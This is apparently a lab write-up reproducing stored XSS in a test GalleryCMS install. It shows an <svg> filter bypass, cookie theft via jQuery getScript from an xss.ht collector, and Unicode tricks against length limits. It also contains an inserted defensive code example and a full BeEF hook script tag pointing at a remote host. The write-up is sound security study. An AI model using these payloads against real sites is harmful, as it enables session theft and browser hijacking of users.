XSS vulnerability reproduction
2022-08-03 21:11:00 【hug kitten】
Contents
XSS reproduction: GalleryCMS character-length limit and short-domain-name bypass
Step 1: Upload an arbitrary string first and see where it ends up
Step 2: Test again to see whether JS code works
Step 3: Bypass using the getScript() function
Step 4: Reproduce the GalleryCMS 20-character limit short-domain-name bypass with BeEF
XSS reproduction: GalleryCMS character-length limit and short-domain-name bypass
We first set up the GalleryCMS server.
Step 1: Upload an arbitrary string first and see where it ends up
The data we uploaded can be seen in the database.
Step 2: Test again to see whether JS code works
It is displayed in the database as shown, which means JS code is restricted, so we cannot trigger the pop-up window.
Looking at the source code, it limits our input to a length of 45 and filters many tags and other things.
But the source shows no restriction on the <svg> tag, so we try <svg> to test whether the filter can be bypassed.
Bypass successful:
Step 3: Bypass using the getScript() function
We found that this page uses the jQuery framework, so we try to bypass the filter with the getScript() function.
getScript() function: loads and executes JavaScript using an AJAX HTTP GET request.
Syntax: (selector).getScript(url,success(response,status))

| Parameter | Description |
|---|---|
| url | Required. Specifies the URL to which the request is sent. |
| success(response,status) | Optional. Specifies a function to run when the request succeeds. Extra parameters: response, status. |
We try to combine the <svg> tag with getScript to retrieve the cookie value.
We used a page allocated by the xss-hunter system, telsm.xss.ht. It has many functions for collecting information; it requires registration, and a custom subdomain of xss.ht can only be used after registering. I did not register the domain name, so I cannot see the captured message, but it still indicates success.
Step 4: Reproduce the GalleryCMS 20-character limit short-domain-name bypass with BeEF
We changed the maximum character limit to 20 characters and try to bypass it with the BeEF tool.
But the basic commands exceed 20 characters.
Given the character-length limit, how can the bypass be achieved?
1. Use Unicode encoding: Unicode has several special characters, for example "tel" counts as only one character in Unicode (℡).
2. Domain-name redirection: domestic domain-name redirection requires ICP filing, so only foreign domain names can be used.
We use the first method: bypass with Unicode special characters.
- ℠ expands to sm
- ㏛ expands to sr
- st expands to st
- ㎭ expands to rad
- ℡ expands to tel
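The two controls the post defeats, a tag blacklist (Step 2) and a raw character-length limit (Step 4), fail for the same reason: the server checks the bytes it received, not what the browser will actually interpret. The following is an added example, not code from the original post or from GalleryCMS; the blacklisted tag list, the sample `<svg>` string and the hostname `℡.example` are constructed for illustration. It shows that a blacklist passes `<svg>` untouched while HTML output encoding renders it inert, and that a length check that does not NFKC-normalise undercounts the compatibility characters listed above, because the browser's URL parser (UTS #46 mapping) expands `℡` to `tel` before resolving the host.

```javascript
// Added example (not from the original post). Names and sample inputs are constructed.

// 1. A blacklist filter of the kind the post describes. The tag list is hypothetical:
//    it strips a few known tags but has no rule for <svg>, so <svg> passes through.
const BLACKLISTED_TAGS = ['script', 'img', 'iframe', 'object'];
function blacklistFilter(input) {
  let out = input;
  for (const tag of BLACKLISTED_TAGS) {
    out = out.replace(new RegExp(`</?${tag}\\b[^>]*>`, 'gi'), '');
  }
  return out;
}

// 2. Contextual output encoding, the correct control for data placed into HTML text:
//    every tag, including <svg>, becomes inert text regardless of its length.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(input) {
  return input.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// 3. Length limits: browsers map hostnames with UTS #46, which applies compatibility
//    decomposition, so U+2121 "℡" is resolved as "tel". A length check must therefore
//    measure the normalised, case-folded form, not the code points that were typed.
function expandCompat(s) {
  return s.normalize('NFKC').toLowerCase();
}
function rawLength(s) {
  return [...s].length;          // code points as submitted
}
function effectiveLength(s) {
  return [...expandCompat(s)].length;
}
function withinLimit(s, limit) {
  return effectiveLength(s) <= limit;
}

// What the WHATWG URL parser (Node's implementation here) actually resolves.
function resolvedHostname(url) {
  return new URL(url).hostname;
}

// Constructed samples
const SVG_SAMPLE = '<svg>test</svg>';    // tag the post reports the filter misses
const SHORT_HOST = '//℡.example/x.js';   // constructed; looks like 16 code points

if (typeof module !== 'undefined' && require.main === module) {
  console.log(blacklistFilter(SVG_SAMPLE));   // passes through unchanged
  console.log(escapeHtml(SVG_SAMPLE));        // rendered as text, not markup
  console.log(rawLength(SHORT_HOST), effectiveLength(SHORT_HOST));
  console.log(resolvedHostname('http:' + SHORT_HOST));
}
```

Run with `node` to see the blacklist output beside the encoded output, and the raw length next to the effective length. The practical fix for the CMS is to drop the blacklist and apply `escapeHtml` (or the templating engine's equivalent) at output time; if a length limit is kept for business reasons, apply it after NFKC normalisation so that it counts what the browser will see.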
First we start beef-xss:
Log in to the BeEF web UI; the BeEF username and password can be found in the file /etc/beef-xss/config.yml.
Copy the contents of hook.js into /var/www/html/index.html on the server. Because I do not have my own domain name, I modified the configuration file myself and tested with an IP address: <script src="//192.168.112.131:3000/hook.js"></script>
Success.